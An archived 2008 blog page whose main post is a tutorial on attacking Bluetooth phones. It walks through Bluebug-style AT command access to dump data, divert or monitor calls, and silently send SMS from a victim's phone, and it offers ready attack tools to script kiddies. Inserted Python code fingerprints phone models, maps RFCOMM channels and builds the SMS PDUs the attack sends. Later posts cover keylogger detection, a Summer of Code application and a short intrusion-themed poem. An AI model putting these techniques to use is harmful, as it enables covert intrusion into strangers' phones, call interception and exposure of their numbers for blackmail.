well, now
Archive for the Uncategorized Category
Bluetooth Intrusion: How it works
Posted in Uncategorized with tags bluejacking, bluetooth hacking, india, security on April 24, 2008 by Anirudh Sharma
A tutorial I wrote a long time back for the neworder group.
The fundamentals of Bluetooth security still remain the same. Read on.
This manual aims at letting everyone know the Pandora's box in their very own pocket, the Bluetooth-enabled mobile phone, and how it works!
Bluetooth, as we all know, is a short-range radio technology for exchanging data between devices without wires. Nowadays it is seen mostly in mobile phones. In India, after the cell phone revolution, almost everyone is switching over to Bluetooth-enabled handsets, which make life easier by allowing free transfer of data within a comfortable range, multiplayer gaming and so on.
It is better than infrared (the one in your TV remote) because it needs no line of sight, operates on low power, and is a low-cost technology with no usage charges. So there is no reason it won't be popular!
However, in the mind of a hacker the ways to intrude keep germinating. As I said, nothing is unbreakable, Bluetooth included. So before this cranky lecture gets on your nerves, let me start the real thing.
It has been found that the complete memory contents of some mobile phones can be accessed by a previously trusted ("paired") device that has since been removed from the trusted list. This data includes not only the phonebook and calendar but also media files such as pictures, and text messages. In essence, the entire device can be "backed up" to an attacker's own system.
A good attacker generally opens a serial port connection (an RFCOMM channel) to the phone, which gives full access to the AT command set (the same kind of commands that connect your modem to the Internet, although the set differs for Bluetooth phones). Over that channel, with tools freely available online, he can run PPP for networking and messaging, manage contacts (add and delete), set up diverts, initiate calls, connect to data services such as the Internet through GPRS, and even monitor conversations in the vicinity of the phone. The last is done by making the phone place a voice call over the GSM network to the attacker's number, so the attacker can be anywhere in the world; Bluetooth access is needed only for a few seconds to set up the call. Call forwarding diverts can be set so that the innocent owner's incoming calls are intercepted, either to provide a channel for calls to more expensive destinations or for identity theft by impersonating the victim. Hackers are getting smart. So should you.
************************
The Indian context
************************
He can even use that to transfer the balance on his cash card by moving it from yours! (This is the exploit I discovered recently in the biggest GSM company in India while I was playing around with Bluetooth.)
Sounds scary!
It is!
Bluetooth devices are classified into three power classes:
Class 1 – Range = high, up to 100 meters (100 mW)
Class 2 – Range = medium, up to 10 meters (2.5 mW)
Class 3 – Range = low, up to about 1 meter (1 mW)
We are dealing with Class 2 and 3 devices; mobile phones are normally Class 2.
Every Bluetooth-enabled device has some characteristics that are either unique (the Bluetooth device address), manufacturer-specific (the first part of the Bluetooth device address) or model-specific (the service description records).
Bluetooth Device Address
The Bluetooth device address (BD_ADDR) is something like an IP address, unique to each device. It consists of 6 bytes and looks like a MAC address: MM:MM:MM:XX:XX:XX. It is a hardware address burnt into the ROM of the device's chipset. The first three bytes (the M bytes in the notation above) are the manufacturer's OUI, the same registry used for Ethernet MAC addresses, and they tell us who made the Bluetooth chipset. This is the first step in learning the device's properties, and tools such as @stake's redfang work from this address. Unfortunately, the lower three bytes (the X bytes) do not tell us which model it is.
Service Discovery Protocol Records
Each Bluetooth device that accepts communication from other Bluetooth devices announces its offered services through the Service Discovery Protocol (SDP). It is like a profile of the device, so remote devices can query it for its capabilities. SDP records are returned to the querying device and hold the information needed to access each service, for example the RFCOMM channel number. My method hashes certain values from the SDP records and generates a unique fingerprint that is then used to refer to a certain phone model.
Take a look at this SDP record (from a Nokia 6310i):
Service Name: OBEX Object Push
Service RecHandle: 0x1000c
Service Class ID List:
  "OBEX Object Push" (0x1105)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 9
  "OBEX" (0x0008)
Profile Descriptor List:
  "OBEX Object Push" (0x1105)
    Version: 0x0100
Now the attacker runs the Blueprint software and obtains the following result:
00:60:57@2621543
Device: Nokia 6310i
Version: V 5.22 15-11-200x NP
Type: Mobile phone
Note: Vulnerable to Bluebug attack (the AT command attack described above)
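To make the two identification steps above concrete (OUI from the BD_ADDR, then a fingerprint computed from the SDP records), here is a small Python script I am adding to this page. It is not the author's Perl tool or the Blueprint software; the sdptool-style records and the device address are constructed sample data, the OUI table is an illustrative subset (verify prefixes against the IEEE registry before trusting them), and the hash (sum of record handle times RFCOMM channel) is my own simplification of "hashing certain values from the SDP records", not the exact Blueprint formula.

```python
import re

# Constructed sdptool-style output for two records of one phone (sample data,
# not a real capture). The OBEX Object Push record mirrors the one shown above;
# a Dial-up Networking record is added so the hash covers more than one service.
SAMPLE_SDP = """\
Service Name: OBEX Object Push
Service RecHandle: 0x1000c
Service Class ID List:
  "OBEX Object Push" (0x1105)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 9
  "OBEX" (0x0008)

Service Name: Dial-up networking
Service RecHandle: 0x10001
Service Class ID List:
  "Dialup Networking" (0x1103)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 1
"""

# Illustrative subset of the IEEE OUI registry (assumption: check real prefixes
# at standards-oui.ieee.org before trusting an attribution).
OUI_TABLE = {
    "00:60:57": "Murata Manufacturing (Bluetooth modules used in Nokia phones)",
}

BDADDR_RE = re.compile(r"^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")
UUID_RE = re.compile(r'"([^"]+)"\s+\((0x[0-9A-Fa-f]+)\)')


def oui(bdaddr):
    """Return the manufacturer part (upper three bytes) of a BD_ADDR."""
    if not BDADDR_RE.match(bdaddr):
        raise ValueError("not a Bluetooth device address: %r" % bdaddr)
    return bdaddr[:8].upper()


def manufacturer(bdaddr):
    return OUI_TABLE.get(oui(bdaddr), "unknown OUI")


def parse_sdp(text):
    """Parse sdptool-style browse output into a list of service records."""
    records, cur, section = [], None, ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Service Name:"):
            cur = {"name": line.split(":", 1)[1].strip(),
                   "handle": None, "class_ids": [], "channel": None}
            records.append(cur)
            section = ""
        elif cur is None or not line:
            continue
        elif line.startswith("Service RecHandle:"):
            cur["handle"] = int(line.split(":", 1)[1].strip(), 16)
        elif line.startswith("Channel:"):
            cur["channel"] = int(line.split(":", 1)[1].strip())
        elif line.endswith("List:"):
            section = line
        else:
            m = UUID_RE.match(line)
            if m and section.startswith("Service Class ID"):
                cur["class_ids"].append(int(m.group(2), 16))
    return records


def rfcomm_channels(records):
    """Map service name -> RFCOMM channel. These are the channels an attacker
    connects to; the serial/DUN one exposes the AT command interface."""
    return {r["name"]: r["channel"] for r in records if r["channel"] is not None}


def blueprint(bdaddr, records):
    """Simplified model fingerprint in the OUI@hash form shown above.
    Assumption: hash = sum over records of handle * RFCOMM channel. It is
    stable across phones of one model because the firmware assigns the same
    handles and channels, but it is not the author's exact formula."""
    h = sum(r["handle"] * (r["channel"] or 0) for r in records)
    return "%s@%d" % (oui(bdaddr), h)


if __name__ == "__main__":
    recs = parse_sdp(SAMPLE_SDP)
    addr = "00:60:57:12:34:56"  # constructed address
    print(blueprint(addr, recs), manufacturer(addr))
    print(rfcomm_channels(recs))
```

On a real phone you would feed it the output of `sdptool browse <bdaddr>` and the address from `hcitool scan`; the interesting output for the next step is the RFCOMM channel map, because that is where the attacker's rfcomm connection goes.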
How the attack begins!
The first step is to scan for all the devices in range of the attacker's phone (here I will limit this manual to mobile phones only). After deciding whom to bluejack/attack, the hacker sends him a message using bluejacking software on the phone.
This is normally only possible if the device is in "discoverable" or "visible" mode, but there are tools available on the Internet (redfang is one) that bypass even this safety by brute-forcing device addresses, so switching off visibility is not real protection.
I have written a program in Perl for such intrusions. Use it to check your phone's vulnerability to attacks. I will give you the source later in the NH group.
How to send SMS from a hacked phone!
This technique can be used by the attacker to learn your mobile phone number: he makes your phone send an SMS to himself, and your number arrives with it (now think of the consequences, blackmailing etc.).
SMS messages are sent as SMS PDUs, the binary format defined in GSM 03.40. The format itself is standard, but the AT command support for sending them varies from one phone maker to another.
For Nokia PDU details visit the German site www.nobbi.com. The sending of the SMS is generally not visible to the user of the attacked phone, and settings can be made so that no delivery report is generated on the phone, so the sending is completely hidden from the victim.
AT commands:
AT+CMGF=0    // Set PDU mode
AT+CSMS=0    // Select message service 0; the reply shows which SMS commands the phone supports
AT+CMGS=23   // Send message, 23 octets (excluding the leading 00 octet); the phone answers with a ">" prompt
>0011000B916407281553F80000AA0AE8329BFD4697D9EC37    // the PDU, terminated with Ctrl-Z (0x1A)
There are 23 octets in this message (46 hex characters). The first octet ("00") doesn't count; it is only the length of the SMSC information supplied (0, meaning use the phone's default SMSC). The PDU string consists of the following
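As an added example (not from the original post), the Python below builds exactly the SMS-SUBMIT PDU quoted above from a destination number and a text, and decodes it back field by field, so you can see what the attacker's AT+CMGS line actually carries: the PDU on this page is a message "hellohello" to +46708251358 with a 4-day validity. It assumes single-part messages and text limited to characters whose GSM 03.38 code equals ASCII (letters, digits, space and basic punctuation); anything else needs the full alphabet table.

```python
# GSM 03.40 SMS-SUBMIT PDU encoder/decoder for the PDU quoted above.
# Assumptions: text uses only characters whose GSM 03.38 code equals ASCII
# (letters, digits, space, basic punctuation); single-part messages only.

GSM_SAFE = set(" !\"#%&'()*+,-./0123456789:;<=>?"
               "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
               "abcdefghijklmnopqrstuvwxyz")


def pack_7bit(text):
    """Pack septets LSB-first into octets, as GSM 03.38 requires."""
    out, acc, bits = bytearray(), 0, 0
    for ch in text:
        if ch not in GSM_SAFE:
            raise ValueError("character %r needs GSM 03.38 mapping" % ch)
        acc |= ord(ch) << bits
        bits += 7
        while bits >= 8:
            out.append(acc & 0xFF)
            acc >>= 8
            bits -= 8
    if bits:
        out.append(acc & 0xFF)
    return bytes(out)


def unpack_7bit(data, septets):
    """Inverse of pack_7bit; septets is TP-UDL (number of characters)."""
    out, acc, bits = [], 0, 0
    for b in data:
        acc |= b << bits
        bits += 8
        while bits >= 7 and len(out) < septets:
            out.append(chr(acc & 0x7F))
            acc >>= 7
            bits -= 7
    return "".join(out)


def encode_number(digits):
    """Semi-octet (nibble-swapped) encoding of a digit string, F-padded."""
    if len(digits) % 2:
        digits += "F"
    return "".join(digits[i + 1] + digits[i] for i in range(0, len(digits), 2))


def decode_number(hexdigits):
    swapped = "".join(hexdigits[i + 1] + hexdigits[i] for i in range(0, len(hexdigits), 2))
    return swapped.rstrip("F")


def build_submit_pdu(number, text, validity=0xAA):
    """Return (pdu_hex, tpdu_length); tpdu_length is the AT+CMGS argument."""
    digits = number.lstrip("+")
    tpdu = bytearray([0x11, 0x00])          # SMS-SUBMIT, relative VP present; TP-MR = 0
    tpdu.append(len(digits))                # TP-DA length in digits
    tpdu.append(0x91)                        # type of address: international, ISDN
    tpdu += bytes.fromhex(encode_number(digits))
    tpdu += bytes([0x00, 0x00, validity])   # TP-PID, TP-DCS (7-bit default), TP-VP
    tpdu.append(len(text))                  # TP-UDL in septets
    tpdu += pack_7bit(text)
    return "00" + tpdu.hex().upper(), len(tpdu)   # leading 00 = use the phone's SMSC


def validity_days(vp):
    """Relative TP-VP octet to days (the 168..196 band used above)."""
    if 168 <= vp <= 196:
        return vp - 166
    raise ValueError("TP-VP %d is not in the days band" % vp)


def decode_submit_pdu(pdu_hex):
    data = bytes.fromhex(pdu_hex)
    i = 1 + data[0]                          # skip SMSC length + SMSC octets
    first_octet, i = data[i], i + 1
    if first_octet & 0x03 != 0x01:
        raise ValueError("not an SMS-SUBMIT PDU")
    i += 1                                   # TP-MR
    da_len, toa = data[i], data[i + 1]
    i += 2
    n_oct = (da_len + 1) // 2
    number = decode_number(data[i:i + n_oct].hex().upper())
    if toa & 0x70 == 0x10:                   # international number
        number = "+" + number
    i += n_oct
    pid, dcs = data[i], data[i + 1]
    i += 2
    vp = None
    if first_octet & 0x18 == 0x10:           # VPF = relative format
        vp, i = data[i], i + 1
    udl, i = data[i], i + 1
    if dcs & 0x0C != 0x00:
        raise ValueError("only the 7-bit default alphabet is decoded here")
    return {"number": number, "text": unpack_7bit(data[i:], udl), "vp": vp}


PAGE_PDU = "0011000B916407281553F80000AA0AE8329BFD4697D9EC37"

if __name__ == "__main__":
    pdu, n = build_submit_pdu("+46708251358", "hellohello")
    print("AT+CMGS=%d" % n)
    print(">" + pdu)
    print(decode_submit_pdu(PAGE_PDU))
```

The TP-DA field is the whole point of the trick in this section: whatever number the attacker puts there receives the message with the victim's number as sender, which is why one hidden SMS is enough to learn it.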
In the same way a call can be initiated on the hacked phone using AT commands (ATD followed by the number, and the like) that are freely documented on the net.
This is how one can start from scratch and easily attack anyone in range who has a BT-enabled phone.
For newbies and script kiddies I have a few assorted tools in .SIS format (Symbian installers) that will do the needful for them. You can have the full package in the NH files section!
But it's always advisable to try out the real programming, as it turns on the real hacking spirit in you.
That is all for now; hope you liked this manual. Till the next update, I bid you goodbye!
Anirudh Sharma
anirudhsharma.crypto [at] gmail dot com
Doubts and queries via email or the Youth India Forum Hacking Section (www.youthindiaforum.com)
Note: I have used redfang as the reference.
An awesome strategy to catch keyloggers.
Posted in Uncategorized with tags anti hacking, anti keylogger, keylogger detect, keyloggers on April 14, 2008 by Anirudh Sharma
A day back I was looking for a tool that could help me log in from public computers without the fear of being keylogged. I was quite paranoid about logging into my account from public computers. Passwords, once keylogged, can easily be misused; all the cryptography protecting the login is rendered useless at once.
While googling I got a link to this free tool called KL-Detector. It uses a smarter algorithm than most antivirus software to catch running trojans/keyloggers:
1. A keylogger records anything and everything typed on the keyboard to a file on the local hard disk.
2. The amount of data typed on the keyboard equals the amount of data being appended to the log file.
3. The tool looks for this increment in a file's size and compares it to what is typed in real time on the keyboard.
4. If the increments keep matching for a definite period of time, the probability is high that you are being snooped on by a keylogger.
The process can then be ended and the keylogging stopped.
Now this is much smarter than a usual antivirus, which relies on updated signatures from its definition database, and you'll like it when you find it works with every keylogger. I did.
You may download your copy here
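The detection idea in the four steps above is easy to reproduce, so here is an added Python version of it (my code, not KL-Detector's): take a size snapshot of the files you can see, type a known number of characters, snapshot again, and flag files whose growth tracks the typing in every round rather than just once. The file paths and sizes are constructed sample data. Two caveats a practitioner should keep in mind: a logger that buffers in memory, ships keystrokes over the network, or writes to a place your user account cannot read will not show up, and an editor or shell history you are typing into will grow by the same amount and be a false positive, which is why the check should be repeated with varying lengths.

```python
import os

# Constructed sample paths (Windows-style, since the post is about public PCs).
KLOG = "C:/Users/victim/AppData/Roaming/svchost/klog.txt"   # the hidden logger's file
APPLOG = "C:/Windows/Temp/app.log"                          # an unrelated log that also grows
DOC = "C:/Users/victim/notes.txt"                           # a file that does not change

# Each round: (sizes before typing, sizes after typing, number of bytes typed).
# klog.txt grows by exactly what was typed each time; app.log grows once, by
# an unrelated amount; notes.txt never changes.
SAMPLE_ROUNDS = [
    ({KLOG: 1000, APPLOG: 5000, DOC: 200}, {KLOG: 1040, APPLOG: 5700, DOC: 200}, 40),
    ({KLOG: 1040, APPLOG: 5700, DOC: 200}, {KLOG: 1100, APPLOG: 5700, DOC: 200}, 60),
    ({KLOG: 1100, APPLOG: 5700, DOC: 200}, {KLOG: 1125, APPLOG: 5700, DOC: 200}, 25),
]


def snapshot(root):
    """Map every regular file under root to its size in bytes (real filesystem)."""
    sizes = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                sizes[path] = os.path.getsize(path)
            except OSError:
                continue  # vanished or unreadable; skip it
    return sizes


def growth(before, after):
    """Bytes added to each file that grew between two snapshots (new files count in full)."""
    return {p: after[p] - before.get(p, 0) for p in after if after[p] > before.get(p, 0)}


def matches(added, typed, slack):
    """True if a file grew by roughly one or two bytes per key typed; the
    factor of two allows UTF-16 logs, the slack allows per-key metadata."""
    return typed * (1 - slack) <= added <= typed * (2 + slack)


def suspects(rounds, slack=0.25):
    """Files whose growth matched the typing in every round (step 4 above).
    Requiring every round filters out logs that merely happen to grow once."""
    flagged = None
    for before, after, typed in rounds:
        here = {p for p, n in growth(before, after).items() if matches(n, typed, slack)}
        flagged = here if flagged is None else flagged & here
    return sorted(flagged or [])


if __name__ == "__main__":
    print("suspect log files:", suspects(SAMPLE_ROUNDS))
```

To use it for real, call snapshot() on the directories a logger could plausibly write to (user profile, temp, the application directory), type a known string, snapshot again, and repeat a few times with different lengths before trusting the verdict.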
-anirudh
My G00gle Summ3r of C0d3 application ;)
Posted in Uncategorized with tags google summer of code, gsoc, gsoc india, india on April 6, 2008 by Anirudh Sharma
Finally I am ready to submit my ~NUI Google SoC application.
Plan to go out for a beer and a ride today to reboot myself and get back into the coding groove.
GSoC application for NUI group
Anirudh Sharma
Summer of code :) NUI ~
Posted in Uncategorized on April 2, 2008 by Anirudh Sharma
Summer of Code is great. It's keeping me on my toes, keeping me busy; I don't feel tired.
Community interaction on the forums is great; a lot of people encourage, some criticize, which overall helps in improving the idea.
I am a student from India. I think it is somewhat more effort for students here. Open source is still not very popular here; people like sticking to the good old Micro$oft.
The timezone difference is a big problem. Communication on IRC has to take place at night, which is OK, but my college attendance gets badly affected by it.
I'm working with Natural User Interface (NUI) at present. I am excited to do a lot of hardware and code hacking soon.
Right now drafting the proposal for Summer of Code is the priority.
I proposed something on the Nmap Security Scanner mailing list too. Let's see what Fyodor and the others say to it.
-anirudh sharma
What is grey hat india
Posted in Uncategorized on March 16, 2008 by Anirudh Sharma
looking through the keyhole,
just another blog,some random ways to get in,
finding the key,
moving on, moving in
obfuscating steps, cleaning the marks
that’s how we do it, that’s how we’ve planned it
to go beyond the password, here’s my hack!
my first post, maybe I'll get more disciplined tomorrow
-a

